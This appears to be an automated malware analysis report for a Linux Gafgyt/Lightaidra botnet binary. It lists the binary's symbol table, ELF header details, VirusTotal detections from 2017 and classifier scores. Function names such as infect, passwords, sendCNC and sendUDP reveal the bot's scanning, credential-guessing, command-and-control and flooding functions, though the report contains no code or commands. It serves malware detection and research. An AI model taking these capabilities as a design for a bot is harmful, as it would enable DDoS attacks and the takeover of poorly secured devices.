, socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , realloc.c, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sysconf.c, , nprocessors_onln, , usleep.c, , fork.c, , _L_lock_70, , _L_unlock_167, , register-atfork.c, , _L_lock_28, , fork_handler_pool, , _L_unlock_93, , getpid.c, , raise.c, , sleep.c, , pseudo_cancel, , SAVEBX1, , RESTBX1, , pseudo_end, , pseudo_cancel, , PUSHBX1, , POPBX1, , pseudo_end, , pseudo_cancel, , PUSHBX1, , POPBX1, , pseudo_end, , pseudo_cancel, , PUSHBX1, , POPBX1, , pseudo_end, , pseudo_cancel, , PUSHBX1, , POPBX1, , pseudo_end, , libc-cancellation.c, , __uClibc_main.c, , __pthread_return_0, , __check_one_fd, , system.c, , cancel_handler, , lock, , _L_lock_30, , sa_refcntr, , quit, , intr, , _L_unlock_52, , do_system, , _L_lock_74, , _L_unlock_113, , _L_lock_129, , _L_unlock_158, , _L_lock_288, , _L_unlock_328, , __syscall_error.c, , sigaction.c, , __restore_rt, , __restore, , __socketcall.c, , __syscall_rt_sigaction.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getuid.c, , mremap.c, , munmap.c, , nanosleep.c, , __syscall_nanosleep, , sbrk.c, , __C_ctype_tolower.c, , __C_ctype_tolower_data, , closedir.c, , opendir.c, , fd_to_DIR, , C.11.5298, , readdir64.c, , parse_config.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , fgetc.c, , _L_lock_35, , _L_unlock_65, , fgetc_unlocked.c, , memmove.c, , strchrnul.c, , strrchr.c, , memrchr.c, , strcspn.c, , strspn.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , gethostbyname2_r.c, , calloc.c, , libc-tls.c, , init_static_tls, , static_slotinfo, , static_dtv, , static_map, , dl-support.c, , brk.c, , fstat.c, , xstatconv.c, , getdents64.c, , fseeko.c, , fseeko64.c, , _L_lock_34, , _L_unlock_108, , _READ.c, , _adjust_pos.c, , _rfill.c, , _trans2r.c, , _cs_funcs.c, , rawmemchr.c, , mempcpy.c, , ntop.c, , inet_pton4, , xdigits.5147, , inet_ntop4, , decoded.c, , dnslookup.c, , last_id.6918, , last_ns_num.6917, , opennameservers.c, , skip_nospace, , skip_and_NUL_space, , resolv_conf_mtime.6903, , closenameservers.c, , get_hosts_byname_r.c, , gethostbyname_r.c, , gethostname.c, , poll.c, , __syscall_poll, , stat.c, , uname.c, , llseek.c, , strdup.c, , encodeh.c, , decodeh.c, , encodeq.c, , read_etc_hosts_r.c, , encoded.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , __GI_execve, , __libc_sigaction, , strcpy, , recvLine, , rangesA, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI___glibc_strerror_r, , waitpid, , __res_sync, , __open_nameservers, , __GI_fopen, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI_time, , getgid, , __getpid, , sysconf, , printf, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , getdtablesize, , fdopendir, , contains_fail, , __GI___ctype_toupper, , __GI_strcasecmp, , recv, , connect, , spoofTest, , __encode_question, , __GI___uClibc_fini, , numpids, , __encode_header, , sigemptyset, , getRandomPublicIPB, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __xstat32_conv, , __uClibc_fini, , memrchr, , geteuid, , inet_pton, , __GI_snprintf, , __GI_vsnprintf, , __GI_setsid, , memmove, , sendTCP, , snprintf, , __GI_strpbrk, , __GI_fgetc, , __GI_htonl, , __stdio_trans2r_o, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , rangesB2, , _uintmaxtostr, , __libc_fcntl, , atol, , getRandomPublicIP, , __write, , getc_unlocked, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , read_until_response, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , usleep, , __libc_h_errno, , execve, , infectedmessage, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , fgets, , getHost, , wildString, , dupppp, , __waitpid_nocancel, , __xpg_strerror_r, , __read, , getc, , prctl, , _dl_tls_static_used, , memcpy, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , __GI_fgets, , perror, , __GI___open_nocancel, , sendHTTP, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , dup2, , __pthread_mutex_init, , getuid, , __GI_htons, , system, , __open_etc_hosts, , feof, , malloc, , __open, , isatty, , sleep, , vsnprintf, , __dns_lookup, , __GI_read, , __C_ctype_tolower, , __GI___write_nocancel, , random_r, , __dso_handle, , __nptl_deallocate_tsd, , gethostbyname_r, , tcpcsum, , reset_telstate, , fdpclose, , socket, , __GI_dup2, , select, , _dl_nothread_init_static_tls, , __GI_ntohl, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , __GI_closedir, , isspace, , __stdio_seek, , mempcpy, , __GI_strcoll, , __GI_write, , __ctype_toupper, , __resolv_timeout, , __libc_read, , __GI_opendir, , __libc_disable_asynccancel, , _string_syserrmsgs, , __GI_herror, , __GI_open, , __GI_strchr, , __searchdomain, , sigaddset, , _dl_tls_static_align, , __GI_tcgetattr, , __environ, , mmap, , __GI_ntohs, , _Exit, , wcsnrtombs, , bzero, , makeIPPacket, , _dl_tls_max_dtv_idx, , sockprintf, , __GI_inet_ntoa, , send, , __fgetc_unlocked, , abort, , oldranges, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __GI___register_atfork, , __GI_getgid, , srandom_r, , __GI_fputs, , __open_nocancel, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , __GI___read, , pipe, , strnlen, , rawmemchr, , uname, , __GI_mempcpy, , __malloc_state, , __sigaddset, , strrchr, , nanosleep, , __GI_send, , calloc, , h_errno, , sendHTTP2, , __pthread_mutex_unlock, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , rindex, , __GI_execl, , __GI_srandom_r, , __GI___sigismember, , __GI___ctype_tolower, , write, , __fork_generation_pointer, , environ, , __GI_close, , getBuild, , fstat, , fprintf, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , __GI___sigaddset, , strcat, , __GI_brk, , __GI_strcat, , _dl_tls_static_size, , __GI_nanosleep, , __GI_stat, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_gethostname, , __GI_fseek, , _custom_printf_arginfo, , __GI___libc_write, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , setsockopt, , bsd_signal, , fseek, , mremap, , __GI_kill, , __GI_strcmp, , __GI___open, , __GI_memmove, , sendSTD, , setstate, , __read_nocancel, , __decode_dotted, , __local_nameserver, , __stdio_READ, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , tmpdirs, , __stdin, , stdin, , __GI_isatty, , _dl_tls_dtv_slotinfo_list, , _custom_printf_spec, , gethostbyname2_r, , __progname, , strcasestr, , _start, , __deregister_frame_info_bases, , __GI___read_nocancel, , strstr, , __GI_ioctl, , init_rand, , rand, , __close_nameservers, , __libc_errno, , getRandomPublicIP2, , signal, , read, , __xstat64_conv, , __decode_header, , getCores, , __GI_memcpy, , strcoll, , rangesC1, , oldranges2, , wcsrtombs, , _stdio_user_locking, , __linkin_atfork, , strncpy, , __GI___libc_close, , program_invocation_short_name, , strcasecmp, , htonl, , sendto, , __C_ctype_toupper, , StartTheLelz, , __GI___C_ctype_b, , realloc, , __register_atfork, , __GI_gethostbyname_r, , __GI_strncpy, , _dl_tls_dtv_gaps, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , readdir64, , __GI___C_ctype_tolower, , __GI_getrlimit, , bcopy, , __GI_strcpy, , __GI_inet_ntop, , strtok, , __stdio_adjust_position, , malloc_trim, , __GI_poll, , _vfprintf_internal, , __GI_strcasestr, , fork, , __GI___fcntl_nocancel, , __stdio_rfill, , gotIP, , __GI_sleep, , sigaction, , __GI_gethostbyname, , _dl_phdr, , __GI_getc_unlocked, , __uClibc_init, , __GI_munmap, , versionnnn, , _store_inttype, , __getpagesize, , __GI_random, , __GI_mremap, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , strdup, , __libc_close, , __GI_getpid, , inet_aton, , _pthread_cleanup_push_defer, , index, , processCmd, , __sigismember, , fopen, , __bss_start, , __libc_open, , __pthread_unwind, , __GI_strchrnul, , getOurIP, , get_telstate_host, , memset, , __GI_socket, , main, , __glibc_strerror_r, , ourPublicIP, , echoLoader, , listFork, , __stdio_fwrite, , _dl_tls_setup, , negotiate, , srand, , _dl_tls_generation, , __GI_uname, , __resolv_attempts, , __nptl_nthreads, , initstate, , fclose, , __syscall_rt_sigaction, , rangesC3, , ntohs, , sendUDP, , inet_ntoa, , tcgetattr, , time, , opendir, , __libc_system, , __GI_abort, , poll, , __GI___write, , fdpopen, , __GI_fprintf, , __GI___sigdelset, , __get_hosts_byname_r, , __GI___close_nocancel, , rangesB1, , __GI__exit, , herror, , strcmp, , infected, , __GI_strrchr, , shutdown, , advances2, , __nameserver, , data_start, , __GI_sysconf, , __fork_handlers, , infect, , __h_errno_location, , matchPrompt, , getcwd, , __GI_inet_pton, , __libc_enable_asynccancel, , gethostbyname, , _stdio_fopen, , advance_state, , _fini, , __GI_chdir, , __write_nocancel, , __vfork, , __GI_mmap, , fgetc, , gethostname, , contains_success, , sprintf, , fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , strcspn, , socket_connect, , __GI_waitpid, , _stdio_term, , __GI_vfprintf, , __GI_signal, , stderr, , fails, , __GI_readdir64, , commServer, , getRandomPublicIPC, , vfork, , __C_ctype_b, , __libc_setup_tls, , srandom, , _ppfs_setargs, , __GI___libc_waitpid, , __GI_sendto, , __GI_sigemptyset, , __GI_printf, , __waitpid, , __libc_fork, , __close_nocancel, , _dl_init_static_tls, , __atexit_lock, , scanPid, , __fork_lock, , __fcntl_nocancel, , rand_cmwc, , findARandomIP, , advances, , getsockopt, , __GI_fseeko64, , _dl_tls_static_nelem, , hstrerror, , fflush_unlocked, , __stdio_wcommit, , contains_string, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , subversionnnn, , stat, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , contains_response, , __GI___waitpid, , __close, , __GI_gethostbyname2, , _edata, , __stdout, , __GI___close, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_isspace, , __GI_strstr, , __searchdomains, , __GI_fstat, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , __GI_connect, , __curbrk, , contains_infectmessage, , _dl_phnum, , _fpmaxtostr, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , rangesC2, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , inet_ntop, , brk, , gethostbyname2, , __GI_getcwd, , _dl_aux_init, , __GI_perror, , atoi, , successes, , _stdio_openlist_del_lock, , __GI_inet_aton, , _custom_printf_handler, , _setjmp, , fgets_unlocked, , _exit, , szprintf, , strspn, , __libc_recv, , __getdents64, , __lll_lock_wait_private, , strlen, , lseek64, , open, , program_invocation_name, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __fork, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , __GI_config_read, , strchr, , __GI_rawmemchr, , __GI_gethostbyname2_r, , fputs, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , __GI_config_open, , closedir, , getRandomPublicIPA, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __GI___libc_read, , __GI___errno_location, , strchrnul, , readUntil, , fcntl, , read_with_timeout, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , __GI_getsockname, , close, , __GI_config_close, , __libc_connect, , passwords, , __GI_strlen, , mainCommSock, , pids, , sendCNC, , vfprintf, , __progname_full, , strpbrk, , getBogos, , _load_inttype, , __lll_unlock_wake_private, , rangechoice, , raise, , useragents, , free, , __GI_strcspn, , sigprocmask, , getsockname,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048188
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
4
Offset
52
Section Header
Size
40
Number
19
Offset
109160
AVclass
gafgyt
1
VirusTotal
md5
8fe3321ad236dc3357853fb0f42fd5f6
sha1
2bbcb5ae40f614ab895864c23a91770055979c34
SCANS (DETECTION RATE = 56.90%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20170914
version: 17.6.3625.0
detected: True check_circle

CMC
update: 20170913
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=80)
update: 20170914
version: 2017.6.26.1
detected: True check_circle

K7GW
update: 20170914
version: 10.26.24608
detected: False cancel

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 1.1.1.2
detected: True check_circle

Avast
result: ELF:DDoS-Y [Trj]
update: 20170914
version: 17.6.3625.0
detected: True check_circle

Avira
result: DDOS/LNX.Lightaidra.tqpzp
update: 20170913
version: 8.3.3.4
detected: True check_circle

Baidu
update: 20170914
version: 1.0.0.2
detected: False cancel

Cyren
result: ELF/Backdoor.SDAP-9
update: 20170914
version: 5.4.30.7
detected: True check_circle

DrWeb
result: Linux.BackDoor.Fgt.92
update: 20170914
version: 7.0.28.2020
detected: True check_circle

GData
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: A:25.14183B:25.10428
detected: True check_circle

Panda
update: 20170913
version: 4.6.4.2
detected: False cancel

VBA32
update: 20170913
version: 3.12.26.4
detected: False cancel

VIPRE
update: 20170914
version: 61004
detected: False cancel

Zoner
update: 20170914
version: 1.0
detected: False cancel

AVware
update: 20170914
version: 1.5.0.42
detected: False cancel

ClamAV
update: 20170914
version: 0.99.2.0
detected: False cancel

Comodo
update: 20170914
version: 27755
detected: False cancel

F-Prot
update: 20170914
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20170913
version: 0.1.5.2
detected: True check_circle

McAfee
result: RDN/Generic BackDoor
update: 20170914
version: 6.0.6.653
detected: True check_circle

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (classic)
update: 20170914
version: 25.0.0.1
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20170914
version: 4.98.0
detected: True check_circle

Yandex
update: 20170908
version: 5.5.1.3
detected: False cancel

Zillya
update: 20170913
version: 2.0.0.3385
detected: False cancel

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20170913
version: 1.0.0.817
detected: True check_circle

Tencent
result: Linux.Backdoor.Gafgyt.Egop
update: 20170914
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20170914
version: 2014.3.20.0
detected: False cancel

Webroot
update: 20170914
version: 1.0.0.207
detected: False cancel

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 3.0.3.1010
detected: True check_circle

AegisLab
result: Backdoor.Linux.Gafgyt!c
update: 20170914
version: 4.2
detected: True check_circle

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20170914
version: 4.0.1.883
detected: True check_circle

F-Secure
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 11.0.19100.45
detected: True check_circle

Fortinet
result: ELF/Gafgyt.WN!tr.bdr
update: 20170914
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.nak
update: 20170914
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20170914
version: 2013.8.14.323
detected: False cancel

Symantec
result: Trojan.Gen.NPE.2
update: 20170913
version: 1.4.0.0
detected: True check_circle

nProtect
update: 20170914
version: 2017-09-14.01
detected: False cancel

AhnLab-V3
update: 20170914
version: 3.10.0.18405
detected: False cancel

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.af
update: 20170914
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20170914
version: 15.0.1.13
detected: True check_circle

Microsoft
result: DDoS:Linux/Lightaidra
update: 20170914
version: 1.1.14104.0
detected: True check_circle

Qihoo-360
result: Win32/Backdoor.746
update: 20170914
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20170911
version: 6.8.0.5.1904
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20170914
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20170914
version: 16079
detected: True check_circle

TrendMicro
result: TROJ_GEN.F04JC00H817
update: 20170914
version: 9.862.0.1074
detected: True check_circle

WhiteArmor
update: 20170829
detected: False cancel

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20170914
version: 10.26.24609
detected: False cancel

Malwarebytes
update: 20170914
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20170913
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20170913
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Unix.Gafgyt.eohbfa
update: 20170914
version: 1.0.98.19134
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170913
version: 12.0.250.0
detected: True check_circle

SUPERAntiSpyware
update: 20170914
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: RDN/Generic BackDoor
update: 20170914
version: v2015
detected: True check_circle

TrendMicro-HouseCall
result: TROJ_GEN.F04JC00H817
update: 20170914
version: 9.950.0.1006
detected: True check_circle

total
58
sha256
c8c19855b1fecdc283bd419724eb4637406c1827992b201c7520680bcd218ac9
scan_id
c8c19855b1fecdc283bd419724eb4637406c1827992b201c7520680bcd218ac9-1505364566
resource
8fe3321ad236dc3357853fb0f42fd5f6
positives
33
scan_date
2017-09-14 04:49:26
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle